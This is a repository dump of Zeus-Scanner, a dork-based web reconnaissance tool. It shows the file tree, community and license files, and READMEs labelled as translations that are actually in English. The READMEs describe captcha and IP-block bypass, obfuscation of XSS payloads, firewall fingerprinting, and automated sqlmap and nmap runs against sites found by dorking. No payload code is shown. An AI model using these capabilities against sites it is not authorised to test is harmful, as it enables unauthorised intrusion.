├── .github
│   ├── CODE_OF_CONDUCT.md
│   ├── CONTRIBUTING.md
│   ├── ISSUE_TEMPLATE.md
│   ├── LICENSE.md
│   └── translations
│       ├── README-french.md
│       ├── README-russian.md
│       └── README-spanish.md
├── .gitignore
├── Dockerfile
├── README.md
├── bin
│   ├── __init__.py
│   ├── drivers
│   │   ├── geckodriver-v0.17.0-linux32.tar.gz
│   │   ├── geckodriver-v0.17.0-linux64.tar.gz
│   │   ├── geckodriver-v0.18.0-linux32.tar.gz
│   │   ├── geckodriver-v0.18.0-linux64.tar.gz
│   │   ├── geckodriver-v0.19.0-linux32.tar.gz
│   │   └── geckodriver-v0.19.0-linux64.tar.gz
│   └── unzip_gecko.py
├── etc
│   ├── auths
│   │   ├── git_auth
│   │   └── whois_auth
│   ├── checksum
│   │   └── md5sum.md5
│   ├── deprecated
│   │   └── intel_me
│   │       └── __init__.py
│   ├── html
│   │   └── clickjacking_test_page.html
│   ├── scripts
│   │   ├── cleanup.sh
│   │   ├── fix_pie.sh
│   │   ├── install_nmap.sh
│   │   ├── install_xvfb.sh
│   │   ├── launch_sqlmap.sh
│   │   └── reinstall.sh
│   ├── text_files
│   │   ├── agents.txt
│   │   ├── dorks.txt
│   │   ├── link_ext.txt
│   │   └── xss_payloads.txt
│   └── xml
│       └── headers.xml
├── lib
│   ├── __init__.py
│   ├── attacks
│   │   ├── __init__.py
│   │   ├── admin_panel_finder
│   │   │   └── __init__.py
│   │   ├── clickjacking_scan
│   │   │   └── __init__.py
│   │   ├── nmap_scan
│   │   │   ├── __init__.py
│   │   │   └── nmap_opts.py
│   │   ├── sqlmap_scan
│   │   │   ├── __init__.py
│   │   │   └── sqlmap_opts.py
│   │   ├── whois_lookup
│   │   │   ├── __init__.py
│   │   │   └── whois.py
│   │   └── xss_scan
│   │       └── __init__.py
│   ├── core
│   │   ├── __init__.py
│   │   ├── common.py
│   │   ├── decorators.py
│   │   ├── errors.py
│   │   ├── parse.py
│   │   └── settings.py
│   ├── firewall
│   │   ├── __init__.py
│   │   ├── akamai.py
│   │   ├── anquanbao.py
│   │   ├── armor.py
│   │   ├── aws.py
│   │   ├── bigip.py
│   │   ├── cloudflare.py
│   │   ├── cloudfront.py
│   │   ├── dw.py
│   │   ├── fortigate.py
│   │   ├── generic.py
│   │   ├── modsecurity.py
│   │   ├── paloalto.py
│   │   ├── pk.py
│   │   ├── powerful.py
│   │   ├── siteguard.py
│   │   ├── sonicwall.py
│   │   ├── squid.py
│   │   ├── stringray.py
│   │   ├── sucuri.py
│   │   ├── urlscan.py
│   │   ├── varnish.py
│   │   ├── wallarm.py
│   │   ├── webknight.py
│   │   ├── webseal.py
│   │   ├── wordfence.py
│   │   ├── yundun.py
│   │   └── yunsuo.py
│   ├── header_check
│   │   └── __init__.py
│   ├── plugins
│   │   ├── 1024.py
│   │   ├── 360.py
│   │   ├── 3com.py
│   │   ├── 3dcart.py
│   │   ├── 4d.py
│   │   ├── 4images.py
│   │   ├── 68classified.py
│   │   ├── __init__.py
│   │   ├── aardvark.py
│   │   ├── abyss.py
│   │   ├── accellion.py
│   │   ├── atomfeed.py
│   │   ├── b2evolution.py
│   │   ├── bmcremedy.py
│   │   ├── bomgar.py
│   │   ├── clipbucket.py
│   │   ├── googleapi.py
│   │   ├── html5.py
│   │   ├── ihtml.py
│   │   ├── jquery.py
│   │   ├── moodle.py
│   │   ├── mssqlreportmanager.py
│   │   ├── opengraph.py
│   │   ├── openxchange.py
│   │   └── rssfeed.py
│   └── tamper_scripts
│       ├── __init__.py
│       ├── appendnull_encode.py
│       ├── base64_encode.py
│       ├── enclosebrackets_encode.py
│       ├── hex_encode.py
│       ├── lowercase_encode.py
│       ├── multispace2comment_encode.py
│       ├── obfuscateentity_encode.py
│       ├── obfuscateordinal_encode.py
│       ├── randomcase_encode.py
│       ├── space2comment_encode.py
│       ├── space2null_encode.py
│       ├── unicode_encode.py
│       ├── uppercase_encode.py
│       └── url_encode.py
├── requirements.txt
├── var
│   ├── __init__.py
│   ├── auto_issue
│   │   ├── __init__.py
│   │   └── github.py
│   ├── blackwidow
│   │   └── __init__.py
│   └── search
│       ├── __init__.py
│       ├── pgp_search.py
│       └── selenium_search.py
└── zeus.py
/.github/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Contributor Covenant Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, gender identity and expression, level of experience,
9 | nationality, personal appearance, race, religion, or sexual identity and
10 | orientation.
11 |
12 | ## Our Standards
13 |
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 |
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 |
23 | Examples of unacceptable behavior by participants include:
24 |
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 | address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 | professional setting
33 |
34 | ## Our Responsibilities
35 |
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 |
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 |
46 | ## Scope
47 |
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 |
55 | ## Enforcement
56 |
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at zeus.dork.scanner@gmail.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 |
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 |
68 | ## Attribution
69 |
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
72 |
73 | [homepage]: https://www.contributor-covenant.org
74 |
--------------------------------------------------------------------------------
/.github/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributions to Zeus
2 |
3 | ## Bugs!!
4 |
5 | Bug reports are welcome! Please report all bugs to the [Issue Tracker](https://github.com/Ekultek/Zeus-Scanner/issues) by clicking the link and hitting `New Issue`. Zeus will prompt you to automatically create an issue if it hits an unexpected exception. To do it manually, please follow the details below.
6 |
7 | ### Bug report guidelines
8 |
9 | - Before you create a bug report, make sure that the bug has not already been reported by checking the [open](https://github.com/Ekultek/Zeus-Scanner/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/Ekultek/Zeus-Scanner/issues?q=is%3Aissue+is%3Aclosed) issues.
10 | - You can also check if you can answer your own question by looking at the [user manual](https://github.com/Ekultek/Zeus-Scanner/wiki/User-Guide)
11 | - Do a `python zeus.py --update` and try to reproduce the bug with the latest version
12 | - You will need to make sure that your report has detailed information, including (but not limited to):
13 |   - The dork you were using when you received the error
14 |   - Your running context (`clone`, `zip`, etc..)
15 |   - Your operating system
16 |   - The commands passed
17 |   - Any relevant log file information
18 |   - The full error stacktrace
19 |
20 | # Pull requests and code changes
21 |
22 | All pull requests will be fully evaluated and taken seriously, no matter how small the change. To open a pull request you will need to do the following:
23 | - Clone the repository with `git clone https://github.com/ekultek/zeus-scanner.git`
24 | - Read the [user manual](https://github.com/Ekultek/Zeus-Scanner/wiki/User-Guide) carefully and make sure you understand what's going on
25 | - Do your code changes with your favorite editor
26 | - Send a pull request via Github
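
Put together, the flow might look like this (a sketch; the branch name `my-change` and the `<your-fork>` remote are illustrative placeholders, not part of the project's documented workflow):

```
git clone https://github.com/ekultek/zeus-scanner.git
cd zeus-scanner
git checkout -b my-change          # one logical change per pull request
# ... make and test your edits ...
git commit -am "short description of the change"
git push <your-fork> my-change     # push to your own fork, then open the PR on Github
```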
27 |
28 | ### Pull request guidelines
29 |
30 | - Each pull request should have at least one logical change
31 | - Porting to compatibility with `python 3` is allowed and welcomed
32 | - Use spaces not tabs please
33 |
34 | If I consistently see that you are creating clean and functional pull requests, we can discuss the possibility of you getting push access to the repository.
35 |
36 | # Licensing
37 |
38 | By submitting code contributions to Zeus via Git pull request, or by checking them into Zeus's source code repository, it is understood (unless you specify otherwise) that you are offering the Zeus copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions for your contributions, just say so when you send them.
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # What's the problem
2 |
3 |
4 | # Running context
5 |
6 | - Operating system:
7 |
8 | - Zeus version:
9 |
10 | # Any idea on a solution?
11 |
12 |
13 | # Full console commands run
14 |
15 |
16 | # Stacktrace (if applicable)
17 |
18 |
19 | # Full file log information
20 |
--------------------------------------------------------------------------------
/.github/LICENSE.md:
--------------------------------------------------------------------------------
1 | Zeus-Scanner Advanced Dork Scanning Tool
2 | Copyright (C) 2017 Thomas Perkins (Ekultek)
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | (at your option) any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see <https://www.gnu.org/licenses/>.
--------------------------------------------------------------------------------
/.github/translations/README-french.md:
--------------------------------------------------------------------------------
1 | [](https://github.com/ekultek/zeus-scanner/stargazers)
2 | [](https://github.com/ekultek/zeus-scanner/network)
3 | [](https://github.com/ekultek/zeus-scanner/issues)
4 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
5 | [](https://twitter.com/Zeus_Scanner)
6 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
7 |
8 | # Helpful links directory
9 |
10 | - [What is Zeus](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
11 | - [Zeus's features](https://github.com/Ekultek/Zeus-Scanner#features)
12 | - [Requirements and installation](https://github.com/Ekultek/Zeus-Scanner#requirements)
13 |   - [Ubuntu/Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
14 |   - [centOS](https://github.com/Ekultek/Zeus-Scanner#centos)
15 |   - [Others](https://github.com/Ekultek/Zeus-Scanner#others)
16 | - [Screenshots](https://github.com/Ekultek/Zeus-Scanner#screenshots)
17 | - [Demo video](https://vimeo.com/239885768)
18 | - [User manual](https://github.com/Ekultek/Zeus-Scanner/wiki)
19 |   - [How Zeus works](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
20 |   - [Functionality](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
21 |   - [Passing sqlmap flags with Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
22 | - [Legal information](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
23 |   - [License (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
24 |   - [Code of conduct](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
25 | - [Report a bug](https://github.com/Ekultek/Zeus-Scanner/issues/new)
26 | - [Open a pull request](https://github.com/Ekultek/Zeus-Scanner/compare)
27 | - [Contribution guidelines](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
28 | - [Donations to Zeus](https://github.com/Ekultek/Zeus-Scanner#donations)
29 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
30 |
31 | # Zeus-Scanner
32 |
33 | ### What is Zeus?
34 |
35 | Zeus is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and the ability to bypass search engine captchas.
36 |
37 | ### Features
38 |
39 | - A powerful built-in URL parsing engine
40 | - Multiple search engine compatibility (`DuckDuckGo`, `AOL`, `Bing`, and `Google`; the default is `Google`)
41 | - Ability to extract the URL from Google's ban URL, thus bypassing IP blocks
42 | - Ability to extract from Google's webcache URL
43 | - Proxy compatibility (`http`, `https`, `socks4`, `socks5`)
44 | - Tor proxy compatibility and Tor browser emulation
45 | - Parse `robots.txt`/`sitemap.xml` and save them to a file
46 | - Multiple vulnerability assessments (XSS, SQLi, clickjacking, port scanning, admin panel finding, whois lookups, and more)
47 | - Tamper scripts to obfuscate XSS payloads
48 | - Can run with a custom default user-agent, one of over 4000 random user-agents, or a personal user-agent
49 | - Automatic issue creation when an unexpected error arises
50 | - Ability to crawl a webpage and pull all the links
51 | - Can run a singular dork, multiple dorks in a given file, or a random dork from a list of over 5000 carefully researched dorks
52 | - Dork blacklisting: when no sites are found with the search query, the query is saved to a blacklist file
53 | - Identify WAF/IPS/IDS protection of over 20 different firewalls
54 | - Header protection enumeration to check what kind of protection is provided via HTTP headers
55 | - Saving cookies, headers, and other vital information to log files
56 | - and much more...
57 |
58 | ### Screenshots
59 |
60 | Running without any mandatory options, or running the `--help` flag, will output Zeus's help menu:
61 | ![zeus-help](https://user-images.githubusercontent.com/14183473/30176257-63391c62-93c7-11e7-94d7-68fde7818381.png)
62 |
63 | A basic dork scan with the `-d` flag, from the given dork, will launch an automated browser and pull the Google page results:
64 | ![zeus-dork-scan](https://user-images.githubusercontent.com/14183473/30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png)
65 |
66 | Calling the `-s` flag will prompt you to start the sqlmap API server (`python sqlmapapi.py -s`) from sqlmap; it will then connect to the API and perform a sqlmap scan on the found URLs.
67 | ![zeus-sqlmap-api](https://user-images.githubusercontent.com/14183473/30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png)
68 |
69 | You can see more screenshots [here](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
70 |
71 | ### Demo
72 |
73 | [Demo video](https://vimeo.com/239885768)
74 |
75 | ### Requirements
76 |
77 | There are some requirements for this to be run successfully.
78 |
79 | ##### Basic requirements
80 |
81 | - `libxml2-dev`, `libxslt1-dev`, `python-dev` are required for the installation process
82 | - The Firefox web browser is required as of now; you will need Firefox version `<=57 >=51` (between 51 and 57). Full functionality for other browsers will eventually be added.
83 | - If you want to run sqlmap through the URLs, you will need sqlmap somewhere on your system.
84 | - If you want to run a port scan using nmap on the URLs' IP addresses, you will need nmap on your system.
85 | - [Geckodriver](https://github.com/mozilla/geckodriver) is required to run the Firefox web browser and will be installed the first time you run. It will be added to your `/usr/bin` so that it can be run in your ENV PATH.
86 | - You must run as `sudo` the first time so that the driver can be added to your PATH; you may also need to run as `sudo` depending on your permissions. _NOTE:_ `Depending on permissions you may need to be sudo for any run involving the geckodriver`
87 | - `xvfb` is required by `pyvirtualdisplay`; it will be installed on your first run if it is not already installed
88 |
89 | ##### Python package requirements
90 |
91 | - The [selenium-webdriver](http://www.seleniumhq.org/projects/webdriver/) package is required to automate the web browser and bypass API calls.
92 | - The [requests](http://docs.python-requests.org/en/master/) package is required to connect to the URL and to the sqlmap API
93 | - The [python-nmap](http://xael.org/pages/python-nmap-en.html) package is required to run nmap on the URLs' IP addresses
94 | - The [whichcraft](https://github.com/pydanny/whichcraft) package is required to check whether nmap and sqlmap are on your system if you want to use them
95 | - The [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/) package is required to hide the browser display while finding the search URL
96 | - [lxml](https://lxml.readthedocs.io/en/latest/) is required to parse XML data for the sitemap and save it as such
97 | - [psutil](https://github.com/giampaolo/psutil) is required to search for running sqlmap API sessions
98 | - [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) is required to pull all the HREF descriptor tags and parse the HTML into an easily workable syntax
99 |
100 | ### Installation
101 |
102 | You can download the latest [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master), the latest [zip](https://github.com/ekultek/zeus-scanner/zipball/master), or you can find the current stable release [here](https://github.com/Ekultek/Zeus-Scanner/releases). Alternatively, you can install the latest development version by following the instructions that best match your operating system:
103 |
104 | **_NOTE: (optional but highly advised)_** add sqlmap and nmap to your environment PATH by moving them to `/usr/bin` or by adding them to the PATH via terminal
105 |
106 | ##### Ubuntu/Debian
107 |
108 | ```
109 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
110 | ```
111 |
112 | ##### centOS
113 |
114 | ```
115 | sudo yum install gcc python-devel libxml2-devel libxslt-devel && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
116 | ```
117 |
118 | ##### Others
119 |
120 | ```
121 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
122 | ```
123 |
124 | This will install all the package requirements along with the geckodriver
125 |
126 |
127 | ### Donations
128 |
129 | Zeus is created by a small team of developers that have an aspiration for information security and strive to succeed. If you like Zeus and want to donate to our funding, we gladly and appreciatively accept donations via:
130 |
131 | - Bitcoin (BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
132 | - [PayPal](https://www.paypal.me/ZeusScanner)
133 | - Or you can [buy us a coffee](https://ko-fi.com/A28355P5)
134 |
135 | You can be assured that all donations will go towards Zeus funding to make it more reliable and even better; thank you from the Zeus development team
136 |
137 | ### Shoutouts
138 |
139 | ##### [OpenSource Projects](https://www.facebook.com/opensourceprojects/)
140 |
141 | OpenSource Projects is a Facebook community page whose goal is to give developers, new and old, an easy and simple place to share their opensource contributions and projects. I personally think this is an awesome idea; I know how hard it is to get your code noticed by people, and I support these guys 100%. Go ahead and give them a like [here](https://www.facebook.com/opensourceprojects/). They will share any opensource project you send them for free. Thank you OpenSource Projects for giving developers a place to share work with one another!
142 |
143 |
--------------------------------------------------------------------------------
/.github/translations/README-russian.md:
--------------------------------------------------------------------------------
1 | [](https://github.com/ekultek/zeus-scanner/stargazers)
2 | [](https://github.com/ekultek/zeus-scanner/network)
3 | [](https://github.com/ekultek/zeus-scanner/issues)
4 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
5 | [](https://twitter.com/Zeus_Scanner)
6 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
7 |
8 | # Helpful links directory
9 |
10 | - [What is Zeus](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
11 | - [Zeus's features](https://github.com/Ekultek/Zeus-Scanner#features)
12 | - [Requirements and installation](https://github.com/Ekultek/Zeus-Scanner#requirements)
13 |   - [Ubuntu/Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
14 |   - [centOS](https://github.com/Ekultek/Zeus-Scanner#centos)
15 |   - [Others](https://github.com/Ekultek/Zeus-Scanner#others)
16 | - [Screenshots](https://github.com/Ekultek/Zeus-Scanner#screenshots)
17 | - [Demo video](https://vimeo.com/239885768)
18 | - [User manual](https://github.com/Ekultek/Zeus-Scanner/wiki)
19 |   - [How Zeus works](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
20 |   - [Functionality](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
21 |   - [Passing sqlmap flags with Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
22 | - [Legal information](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
23 |   - [License (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
24 |   - [Code of conduct](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
25 | - [Report a bug](https://github.com/Ekultek/Zeus-Scanner/issues/new)
26 | - [Open a pull request](https://github.com/Ekultek/Zeus-Scanner/compare)
27 | - [Contribution guidelines](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
28 | - [Donations to Zeus](https://github.com/Ekultek/Zeus-Scanner#donations)
29 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
30 |
31 | # Zeus-Scanner
32 |
33 | ### What is Zeus?
34 |
35 | Zeus is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and the ability to bypass search engine captchas.
36 |
37 | ### Features
38 |
39 | - A powerful built-in URL parsing engine
40 | - Multiple search engine compatibility (`DuckDuckGo`, `AOL`, `Bing`, and `Google`; the default is `Google`)
41 | - Ability to extract the URL from Google's ban URL, thus bypassing IP blocks
42 | - Ability to extract from Google's webcache URL
43 | - Proxy compatibility (`http`, `https`, `socks4`, `socks5`)
44 | - Tor proxy compatibility and Tor browser emulation
45 | - Parse `robots.txt`/`sitemap.xml` and save them to a file
46 | - Multiple vulnerability assessments (XSS, SQLi, clickjacking, port scanning, admin panel finding, whois lookups, and more)
47 | - Tamper scripts to obfuscate XSS payloads
48 | - Can run with a custom default user-agent, one of over 4000 random user-agents, or a personal user-agent
49 | - Automatic issue creation when an unexpected error arises
50 | - Ability to crawl a webpage and pull all the links
51 | - Can run a singular dork, multiple dorks in a given file, or a random dork from a list of over 5000 carefully researched dorks
52 | - Dork blacklisting: when no sites are found with the search query, the query is saved to a blacklist file
53 | - Identify WAF/IPS/IDS protection of over 20 different firewalls
54 | - Header protection enumeration to check what kind of protection is provided via HTTP headers
55 | - Saving cookies, headers, and other vital information to log files
56 | - and much more...
57 |
58 | ### Screenshots
59 |
60 | Running without any mandatory options, or running the `--help` flag, will output Zeus's help menu:
61 | ![zeus-help](https://user-images.githubusercontent.com/14183473/30176257-63391c62-93c7-11e7-94d7-68fde7818381.png)
62 |
63 | A basic dork scan with the `-d` flag, from the given dork, will launch an automated browser and pull the Google page results:
64 | ![zeus-dork-scan](https://user-images.githubusercontent.com/14183473/30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png)
65 |
66 | Calling the `-s` flag will prompt you to start the sqlmap API server (`python sqlmapapi.py -s`) from sqlmap; it will then connect to the API and perform a sqlmap scan on the found URLs.
67 | ![zeus-sqlmap-api](https://user-images.githubusercontent.com/14183473/30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png)
68 |
69 | You can see more screenshots [here](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
70 |
71 | ### Demo
72 |
73 | [Demo video](https://vimeo.com/239885768)
74 |
75 | ### Requirements
76 |
77 | There are some requirements for this to be run successfully.
78 |
79 | ##### Basic requirements
80 |
81 | - `libxml2-dev`, `libxslt1-dev`, `python-dev` are required for the installation process
82 | - The Firefox web browser is required as of now; you will need Firefox version `<=57 >=51` (between 51 and 57). Full functionality for other browsers will eventually be added.
83 | - If you want to run sqlmap through the URLs, you will need sqlmap somewhere on your system.
84 | - If you want to run a port scan using nmap on the URLs' IP addresses, you will need nmap on your system.
85 | - [Geckodriver](https://github.com/mozilla/geckodriver) is required to run the Firefox web browser and will be installed the first time you run. It will be added to your `/usr/bin` so that it can be run in your ENV PATH.
86 | - You must run as `sudo` the first time so that the driver can be added to your PATH; you may also need to run as `sudo` depending on your permissions. _NOTE:_ `Depending on permissions you may need to be sudo for any run involving the geckodriver`
87 | - `xvfb` is required by `pyvirtualdisplay`; it will be installed on your first run if it is not already installed
88 |
89 | ##### Python package requirements
90 |
91 | - The [selenium-webdriver](http://www.seleniumhq.org/projects/webdriver/) package is required to automate the web browser and bypass API calls.
92 | - The [requests](http://docs.python-requests.org/en/master/) package is required to connect to the URL and to the sqlmap API
93 | - The [python-nmap](http://xael.org/pages/python-nmap-en.html) package is required to run nmap on the URLs' IP addresses
94 | - The [whichcraft](https://github.com/pydanny/whichcraft) package is required to check whether nmap and sqlmap are on your system if you want to use them
95 | - The [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/) package is required to hide the browser display while finding the search URL
96 | - [lxml](https://lxml.readthedocs.io/en/latest/) is required to parse XML data for the sitemap and save it as such
97 | - [psutil](https://github.com/giampaolo/psutil) is required to search for running sqlmap API sessions
98 | - [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) is required to pull all the HREF descriptor tags and parse the HTML into an easily workable syntax
99 |
100 | ### Installation
101 |
102 | You can download the latest [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master), the latest [zip](https://github.com/ekultek/zeus-scanner/zipball/master), or you can find the current stable release [here](https://github.com/Ekultek/Zeus-Scanner/releases). Alternatively, you can install the latest development version by following the instructions that best match your operating system:
103 |
104 | **_NOTE: (optional but highly advised)_** add sqlmap and nmap to your environment PATH by moving them to `/usr/bin` or by adding them to the PATH via terminal
105 |
106 | ##### Ubuntu/Debian
107 |
108 | ```
109 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
110 | ```
111 |
112 | ##### centOS
113 |
114 | ```
115 | sudo yum install gcc python-devel libxml2-devel libxslt-devel && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
116 | ```
117 |
118 | ##### Others
119 |
120 | ```
121 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
122 | ```
123 |
124 | This will install all the package requirements along with the geckodriver
125 |
126 |
127 | ### Donations
128 |
129 | Zeus is created by a small team of developers that have an aspiration for information security and strive to succeed. If you like Zeus and want to donate to our funding, we gladly and appreciatively accept donations via:
130 |
131 | - Bitcoin (BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
132 | - [PayPal](https://www.paypal.me/ZeusScanner)
133 | - Or you can [buy us a coffee](https://ko-fi.com/A28355P5)
134 |
135 | You can be assured that all donations will go towards Zeus funding to make it more reliable and even better; thank you from the Zeus development team
136 |
137 | ### Shoutouts
138 |
139 | ##### [OpenSource Projects](https://www.facebook.com/opensourceprojects/)
140 |
141 | OpenSource Projects is a Facebook community page whose goal is to give developers, new and old, an easy and simple place to share their opensource contributions and projects. I personally think this is an awesome idea; I know how hard it is to get your code noticed by people, and I support these guys 100%. Go ahead and give them a like [here](https://www.facebook.com/opensourceprojects/). They will share any opensource project you send them for free. Thank you OpenSource Projects for giving developers a place to share work with one another!
142 |
143 |
--------------------------------------------------------------------------------
/.github/translations/README-spanish.md:
--------------------------------------------------------------------------------
1 | [](https://github.com/ekultek/zeus-scanner/stargazers)
2 | [](https://github.com/ekultek/zeus-scanner/network)
3 | [](https://github.com/ekultek/zeus-scanner/issues)
4 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
5 | [](https://twitter.com/Zeus_Scanner)
6 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
7 |
8 | # Helpful links directory
9 |
10 | - [What is Zeus](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
11 | - [Zeus's features](https://github.com/Ekultek/Zeus-Scanner#features)
12 | - [Requirements and installation](https://github.com/Ekultek/Zeus-Scanner#requirements)
13 |   - [Ubuntu/Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
14 |   - [centOS](https://github.com/Ekultek/Zeus-Scanner#centos)
15 |   - [Others](https://github.com/Ekultek/Zeus-Scanner#others)
16 | - [Screenshots](https://github.com/Ekultek/Zeus-Scanner#screenshots)
17 | - [Demo video](https://vimeo.com/239885768)
18 | - [User manual](https://github.com/Ekultek/Zeus-Scanner/wiki)
19 |   - [How Zeus works](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
20 |   - [Functionality](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
21 |   - [Passing sqlmap flags with Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
22 | - [Legal information](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
23 |   - [License (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
24 |   - [Code of conduct](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
25 | - [Report a bug](https://github.com/Ekultek/Zeus-Scanner/issues/new)
26 | - [Open a pull request](https://github.com/Ekultek/Zeus-Scanner/compare)
27 | - [Contribution guidelines](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
28 | - [Donations to Zeus](https://github.com/Ekultek/Zeus-Scanner#donations)
29 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
30 |
31 | # Zeus-Scanner
